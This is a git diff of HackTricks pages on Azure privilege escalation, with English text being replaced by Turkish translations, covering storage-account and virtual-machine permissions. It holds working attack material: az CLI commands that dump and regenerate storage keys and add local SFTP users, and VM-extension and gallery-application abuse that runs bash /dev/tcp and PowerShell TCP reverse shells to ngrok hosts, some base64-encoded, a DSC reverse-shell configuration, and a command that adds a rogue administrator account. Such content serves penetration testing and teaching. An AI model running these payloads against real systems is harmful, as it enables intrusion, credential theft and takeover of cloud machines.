Bu izne sahip bir yetkili, depolama hesaplarının **erişim anahtarlarının** (ve gizli değerlerinin) listesini alabilecektir. Bu, yetkilinin depolama hesapları üzerindeki ayrıcalıklarını artırmasına olanak tanır.
```bash
az storage account keys list --account-name <acc-name>
```
### Microsoft.Storage/storageAccounts/regenerateKey/action
A principal with this permission will be able to renew and get the new secret value of the **access keys** of the storage accounts. Allowing the principal to escalate its privileges over the storage accounts.
Moreover, in the response, the user will get the value of the renewed key and also of the not renewed one:
Bu izne sahip bir yetkili, depolama hesaplarının **erişim anahtarlarının** yeni gizli değerini yenileme ve alma yeteneğine sahip olacaktır. Bu, yetkilinin depolama hesapları üzerindeki ayrıcalıklarını artırmasına olanak tanır.
Ayrıca, yanıtında kullanıcı, yenilenen anahtarın değerini ve yenilenmeyen anahtarın değerini de alacaktır:
```bash
az storage account keys renew --account-name <acc-name> --key key2
```
### Microsoft.Storage/storageAccounts/write
A principal with this permission will be able to create or update an existing storage account updating any setting like network rules or policies.
Bu izne sahip bir kullanıcı, mevcut bir depolama hesabını oluşturabilir veya güncelleyebilir ve ağ kuralları veya politikalar gibi herhangi bir ayarı güncelleyebilir.
```bash
# e.g. set default action to allow so network restrictions are avoided
az storage account update --name <acc-name> --default-action Allow
@@ -39,118 +34,101 @@ az storage account update --name <acc-name> --default-action Allow
# e.g. allow an IP address
az storage account update --name <acc-name> --add networkRuleSet.ipRules value=<ip-address>
```
## Blobs Specific privesc
## Blobs Özel privesc
### Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/write | Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete
The first permission allows to **modify immutability policies** in containers and the second to delete them.
İlk izin, konteynerlerde **değiştirilemezlik politikalarını** değiştirmeye, ikincisi ise bunları silmeye olanak tanır.
> [!NOTE]
> Note that if an immutability policy is in lock state, you cannot do neither of both
> Bir değiştirilemezlik politikası kilit durumundaysa, her ikisini de yapamazsınız.
```bash
az storage container immutability-policy delete \
--account-name <STORAGE_ACCOUNT_NAME> \
--container-name <CONTAINER_NAME> \
--resource-group <RESOURCE_GROUP>
--account-name <STORAGE_ACCOUNT_NAME> \
--container-name <CONTAINER_NAME> \
--resource-group <RESOURCE_GROUP>
az storage container immutability-policy update \
--account-name <STORAGE_ACCOUNT_NAME> \
--container-name <CONTAINER_NAME> \
--resource-group <RESOURCE_GROUP> \
--period <NEW_RETENTION_PERIOD_IN_DAYS>
--account-name <STORAGE_ACCOUNT_NAME> \
--container-name <CONTAINER_NAME> \
--resource-group <RESOURCE_GROUP> \
--period <NEW_RETENTION_PERIOD_IN_DAYS>
```
## File shares specific privesc
## Dosya paylaşımlarına özgü privesc
### Microsoft.Storage/storageAccounts/fileServices/takeOwnership/action
This should allow a user having this permission to be able to take the ownership of files inside the shared filesystem.
Bu, bu izne sahip bir kullanıcının paylaşılan dosya sistemindeki dosyaların sahipliğini alabilmesini sağlamalıdır.
### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/modifypermissions/action
This should allow a user having this permission to be able to modify the permissions files inside the shared filesystem.
Bu, bu izne sahip bir kullanıcının paylaşılan dosya sistemindeki dosyaların izinlerini değiştirebilmesini sağlamalıdır.
### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/actassuperuser/action
This should allow a user having this permission to be able to perform actions inside a file system as a superuser.
Bu, bu izne sahip bir kullanıcının bir dosya sisteminde süper kullanıcı olarak eylemler gerçekleştirebilmesini sağlamalıdır.
### Microsoft.Storage/storageAccounts/localusers/write (Microsoft.Storage/storageAccounts/localusers/read)
With this permission, an attacker can create and update (if has `Microsoft.Storage/storageAccounts/localusers/read` permission) a new local user for an Azure Storage account (configured with hierarchical namespace), including specifying the users permissions and home directory. This permission is significant because it allows the attacker to grant themselves to a storage account with specific permissions such as read (r), write (w), delete (d), and list (l) and more. Additionaly the authentication methods that this uses can be Azure-generated passwords and SSH key pairs. There is no check if a user already exists, so you can overwrite other users that are already there. The attacker could escalate their privileges and gain SSH access to the storage account, potentially exposing or compromising sensitive data.
Bu izinle, bir saldırgan, Azure Storage hesabı için yeni bir yerel kullanıcı oluşturabilir ve güncelleyebilir (eğer `Microsoft.Storage/storageAccounts/localusers/read` iznine sahipse), kullanıcının izinlerini ve ana dizinini belirleyebilir. Bu izin önemlidir çünkü saldırgana, okuma (r), yazma (w), silme (d) ve listeleme (l) gibi belirli izinlere sahip bir depolama hesabına kendisini atama yetkisi verir. Ayrıca, bunun kullandığı kimlik doğrulama yöntemleri Azure tarafından üretilen şifreler ve SSH anahtar çiftleri olabilir. Zaten var olan bir kullanıcının kontrolü yapılmaz, bu nedenle mevcut diğer kullanıcıların üzerine yazabilirsiniz. Saldırgan, ayrıcalıklarını artırabilir ve depolama hesabına SSH erişimi kazanarak hassas verileri açığa çıkarabilir veya tehlikeye atabilir.
```bash
az storage account local-user create \
--account-name <STORAGE_ACCOUNT_NAME> \
--resource-group <RESOURCE_GROUP_NAME> \
--name <LOCAL_USER_NAME> \
--permission-scope permissions=rwdl service=blob resource-name=<CONTAINER_NAME> \
--home-directory <HOME_DIRECTORY> \
--has-ssh-key false/true # Depends on the auth method to use
--account-name <STORAGE_ACCOUNT_NAME> \
--resource-group <RESOURCE_GROUP_NAME> \
--name <LOCAL_USER_NAME> \
--permission-scope permissions=rwdl service=blob resource-name=<CONTAINER_NAME> \
--home-directory <HOME_DIRECTORY> \
--has-ssh-key false/true # Depends on the auth method to use
```
### Microsoft.Storage/storageAccounts/localusers/regeneratePassword/action
With this permission, an attacker can regenerate the password for a local user in an Azure Storage account. This grants the attacker the ability to obtain new authentication credentials (such as an SSH or SFTP password) for the user. By leveraging these credentials, the attacker could gain unauthorized access to the storage account, perform file transfers, or manipulate data within the storage containers. This could result in data leakage, corruption, or malicious modification of the storage account content.
Bu izinle, bir saldırgan Azure Storage hesabındaki yerel bir kullanıcı için şifreyi yeniden oluşturabilir. Bu, saldırgana kullanıcı için yeni kimlik doğrulama bilgileri (örneğin, bir SSH veya SFTP şifresi) elde etme yetkisi verir. Bu kimlik bilgilerini kullanarak, saldırgan depolama hesabına yetkisiz erişim sağlayabilir, dosya transferleri gerçekleştirebilir veya depolama konteynerleri içindeki verileri manipüle edebilir. Bu, veri sızıntısına, bozulmaya veya depolama hesabı içeriğinin kötü niyetli bir şekilde değiştirilmesine yol açabilir.
```bash
az storage account local-user regenerate-password \
--account-name <STORAGE_ACCOUNT_NAME> \
--resource-group <RESOURCE_GROUP_NAME> \
--name <LOCAL_USER_NAME>
--account-name <STORAGE_ACCOUNT_NAME> \
--resource-group <RESOURCE_GROUP_NAME> \
--name <LOCAL_USER_NAME>
```
To access Azure Blob Storage via SFTP using a local user via SFTP you can (you can also use ssh key to connect):
Azure Blob Storage'a yerel bir kullanıcı aracılığıyla SFTP ile erişmek için (bağlanmak için ssh anahtarı da kullanabilirsiniz):
```bash
sftp <local-user-name>@<storage-account-name>.blob.core.windows.net
#regenerated-password
```
### Microsoft.Storage/storageAccounts/restoreBlobRanges/action, Microsoft.Storage/storageAccounts/blobServices/containers/read, Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
With this permissions an attacker can restore a deleted container by specifying its deleted version ID or undelete specific blobs within a container, if they were previously soft-deleted. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
Bu izinlerle bir saldırgan, silinmiş bir konteyneri silinmiş sürüm kimliğini belirterek geri yükleyebilir veya daha önce yumuşak silinmişse bir konteyner içindeki belirli blob'ları geri alabilir. Bu ayrıcalık yükselmesi, bir saldırgana kalıcı olarak silinmesi gereken hassas verileri kurtarma imkanı verebilir ve bu da yetkisiz erişime yol açabilir.
```bash
#Restore the soft deleted container
az storage container restore \
--account-name <STORAGE_ACCOUNT_NAME> \
--name <CONTAINER_NAME> \
--deleted-version <VERSION>
--account-name <STORAGE_ACCOUNT_NAME> \
--name <CONTAINER_NAME> \
--deleted-version <VERSION>
#Restore the soft deleted blob
az storage blob undelete \
--account-name <STORAGE_ACCOUNT_NAME> \
--container-name <CONTAINER_NAME> \
--name "fileName.txt"
--account-name <STORAGE_ACCOUNT_NAME> \
--container-name <CONTAINER_NAME> \
--name "fileName.txt"
```
### Microsoft.Storage/storageAccounts/fileServices/shares/restore/action && Microsoft.Storage/storageAccounts/read
With these permissions, an attacker can restore a deleted Azure file share by specifying its deleted version ID. This privilege escalation could allow an attacker to recover sensitive data that was meant to be permanently deleted, potentially leading to unauthorized access.
Bu izinlerle, bir saldırgan silinmiş bir Azure dosya paylaşımını silinmiş sürüm kimliğini belirterek geri yükleyebilir. Bu ayrıcalık yükselmesi, bir saldırganın kalıcı olarak silinmesi gereken hassas verilere erişimini sağlayabilir ve bu da yetkisiz erişime yol açabilir.
```bash
az storage share-rm restore \
--storage-account <STORAGE_ACCOUNT_NAME> \
--name <FILE_SHARE_NAME> \
--deleted-version <VERSION>
--storage-account <STORAGE_ACCOUNT_NAME> \
--name <FILE_SHARE_NAME> \
--deleted-version <VERSION>
```
## Diğer ilginç görünen izinler (TODO)
## Other interesting looking permissions (TODO)
- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Changes ownership of the blob
- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Modifies permissions of the blob
- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Returns the result of the blob command
- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/manageOwnership/action: Blob'un sahipliğini değiştirir
- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/modifyPermissions/action: Blob'un izinlerini değiştirir
- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/runAsSuperUser/action: Blob komutunun sonucunu döndürür
- Microsoft.Storage/storageAccounts/blobServices/containers/blobs/immutableStorage/runAsSuperUser/action
## References
## Referanslar
- [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/storage#microsoftstorage)
- [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
{{#include ../../../banners/hacktricks-training.md}}

330
src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md
View File

@@ -1,10 +1,10 @@
# Az - Virtual Machines & Network Privesc
# Az - Sanal Makineler & Ağ Privesc
{{#include ../../../banners/hacktricks-training.md}}
## VMS & Network
## VMS &
For more info about Azure Virtual Machines and Network check:
Azure Sanal Makineler ve Ağ hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/vms/
@@ -12,14 +12,13 @@ For more info about Azure Virtual Machines and Network check:
### **`Microsoft.Compute/virtualMachines/extensions/write`**
This permission allows to execute extensions in virtual machines which allow to **execute arbitrary code on them**.\
Example abusing custom extensions to execute arbitrary commands in a VM:
Bu izin, sanal makinelerde uzantıları çalıştırmaya olanak tanır ve bu da **onlarda rastgele kod çalıştırmayı** sağlar.\
Bir VM'de rastgele komutlar çalıştırmak için özel uzantıların kötüye kullanılması örneği:
{{#tabs }}
{{#tab name="Linux" }}
- Execute a revers shell
- Bir ters kabuk çalıştırın
```bash
# Prepare the rev shell
echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
@@ -27,120 +26,108 @@ YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ==
# Execute rev shell
az vm extension set \
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{}' \
--protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{}' \
--protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
```
- Execute a script located on the internet
- İnternette bulunan bir scripti çalıştırın
```bash
az vm extension set \
--resource-group rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
--protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
--resource-group rsc-group> \
--vm-name <vm-name> \
--name CustomScript \
--publisher Microsoft.Azure.Extensions \
--version 2.1 \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
--protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
```
{{#endtab }}
{{#tab name="Windows" }}
- Execute a reverse shell
- Ters bir shell çalıştırın
```bash
# Get encoded reverse shell
echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
# Execute it
az vm extension set \
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScriptExtension \
--publisher Microsoft.Compute \
--version 1.10 \
--settings '{}' \
--protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScriptExtension \
--publisher Microsoft.Compute \
--version 1.10 \
--settings '{}' \
--protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}'
```
- Execute reverse shell from file
- Dosyadan ters kabuk çalıştırın
```bash
az vm extension set \
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScriptExtension \
--publisher Microsoft.Compute \
--version 1.10 \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
--protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
--resource-group <rsc-group> \
--vm-name <vm-name> \
--name CustomScriptExtension \
--publisher Microsoft.Compute \
--version 1.10 \
--settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \
--protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}'
```
Ayrıca şu diğer yükleri de çalıştırabilirsiniz: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add`
- Reset password using the VMAccess extension
- VMAccess uzantısını kullanarak şifreyi sıfırlama
```powershell
# Run VMAccess extension to reset the password
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
```
{{#endtab }}
{{#endtabs }}
It's also possible to abuse well-known extensions to execute code or perform privileged actions inside the VMs:
Aynı zamanda, VMs içinde kod çalıştırmak veya ayrıcalıklı eylemler gerçekleştirmek için iyi bilinen uzantıların kötüye kullanılması da mümkündür:
<details>
<summary>VMAccess extension</summary>
This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs.
<summary>VMAccess uzantısı</summary>
Bu uzantı, Windows VMs içindeki kullanıcıların şifresini değiştirmeye (veya yoksa oluşturmasına) olanak tanır.
```powershell
# Run VMAccess extension to reset the password
$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password
Set-AzVMAccessExtension -ResourceGroupName "<rsc-group>" -VMName "<vm-name>" -Name "myVMAccess" -Credential $cred
```
</details>
<details>
<summary>DesiredConfigurationState (DSC)</summary>
This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension:
Bu, Azure Windows VM'lerinin yapılandırmasını yönetmek için PowerShell DSC kullanan Microsoft'a ait bir **VM uzantısı**dır. Bu nedenle, bu uzantı aracılığıyla Windows VM'lerinde **rastgele komutlar çalıştırmak** için kullanılabilir:
```powershell
# Content of revShell.ps1
Configuration RevShellConfig {
Node localhost {
Script ReverseShell {
GetScript = { @{} }
SetScript = {
$client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length)
}
$client.Close()
}
TestScript = { return $false }
}
}
Node localhost {
Script ReverseShell {
GetScript = { @{} }
SetScript = {
$client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length)
}
$client.Close()
}
TestScript = { return $false }
}
}
}
RevShellConfig -OutputPath .\Output
@@ -148,95 +135,91 @@ RevShellConfig -OutputPath .\Output
$resourceGroup = 'dscVmDemo'
$storageName = 'demostorage'
Publish-AzVMDscConfiguration `
-ConfigurationPath .\revShell.ps1 `
-ResourceGroupName $resourceGroup `
-StorageAccountName $storageName `
-Force
-ConfigurationPath .\revShell.ps1 `
-ResourceGroupName $resourceGroup `
-StorageAccountName $storageName `
-Force
# Apply DSC to VM and execute rev shell
$vmName = 'myVM'
Set-AzVMDscExtension `
-Version '2.76' `
-ResourceGroupName $resourceGroup `
-VMName $vmName `
-ArchiveStorageAccountName $storageName `
-ArchiveBlobName 'revShell.ps1.zip' `
-AutoUpdate `
-ConfigurationName 'RevShellConfig'
-Version '2.76' `
-ResourceGroupName $resourceGroup `
-VMName $vmName `
-ArchiveStorageAccountName $storageName `
-ArchiveBlobName 'revShell.ps1.zip' `
-AutoUpdate `
-ConfigurationName 'RevShellConfig'
```
</details>
<details>
<summary>Hybrid Runbook Worker</summary>
<summary>Hibrit Runbook Çalışanı</summary>
This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-services/az-automation-account/).
Bu, otomasyon hesabından VM'lerde runbook'ları çalıştırmaya olanak tanıyan bir VM uzantısıdır. Daha fazla bilgi için [Otomasyon Hesapları hizmetine](../az-services/az-automation-account/) bakın.
</details>
### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)`
These are the required permissions to **create a new gallery application and execute it inside a VM**. Gallery applications can execute anything so an attacker could abuse this to compromise VM instances executing arbitrary commands.
Bunlar, **yeni bir galeri uygulaması oluşturmak ve bunu bir VM içinde çalıştırmak için gereken izinlerdir**. Galeri uygulamaları her şeyi çalıştırabilir, bu nedenle bir saldırgan, rastgele komutlar çalıştıran VM örneklerini tehlikeye atmak için bunu kötüye kullanabilir.
The last 2 permissions might be avoided by sharing the application with the tenant.
Son 2 izin, uygulamayı kiracı ile paylaşarak atlanabilir.
Exploitation example to execute arbitrary commands:
Rastgele komutları çalıştırmak için istismar örneği:
{{#tabs }}
{{#tab name="Linux" }}
```bash
# Create gallery (if the isn't any)
az sig create --resource-group myResourceGroup \
--gallery-name myGallery --location "West US 2"
--gallery-name myGallery --location "West US 2"
# Create application container
az sig gallery-application create \
--application-name myReverseShellApp \
--gallery-name myGallery \
--resource-group <rsc-group> \
--os-type Linux \
--location "West US 2"
--application-name myReverseShellApp \
--gallery-name myGallery \
--resource-group <rsc-group> \
--os-type Linux \
--location "West US 2"
# Create app version with the rev shell
## In Package file link just add any link to a blobl storage file
az sig gallery-application version create \
--version-name 1.0.2 \
--application-name myReverseShellApp \
--gallery-name myGallery \
--location "West US 2" \
--resource-group <rsc-group> \
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"
--version-name 1.0.2 \
--application-name myReverseShellApp \
--gallery-name myGallery \
--location "West US 2" \
--resource-group <rsc-group> \
--package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \
--install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \
--update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'"
# Install the app in a VM to execute the rev shell
## Use the ID given in the previous output
az vm application set \
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true
--resource-group <rsc-group> \
--name <vm-name> \
--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \
--treat-deployment-as-failure true
```
{{#endtab }}
{{#tab name="Windows" }}
```bash
# Create gallery (if the isn't any)
az sig create --resource-group <rsc-group> \
--gallery-name myGallery --location "West US 2"
--gallery-name myGallery --location "West US 2"
# Create application container
az sig gallery-application create \
--application-name myReverseShellAppWin \
--gallery-name myGallery \
--resource-group <rsc-group> \
--os-type Windows \
--location "West US 2"
--application-name myReverseShellAppWin \
--gallery-name myGallery \
--resource-group <rsc-group> \
--os-type Windows \
--location "West US 2"
# Get encoded reverse shell
echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64
@@ -245,59 +228,55 @@ echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",1
## In Package file link just add any link to a blobl storage file
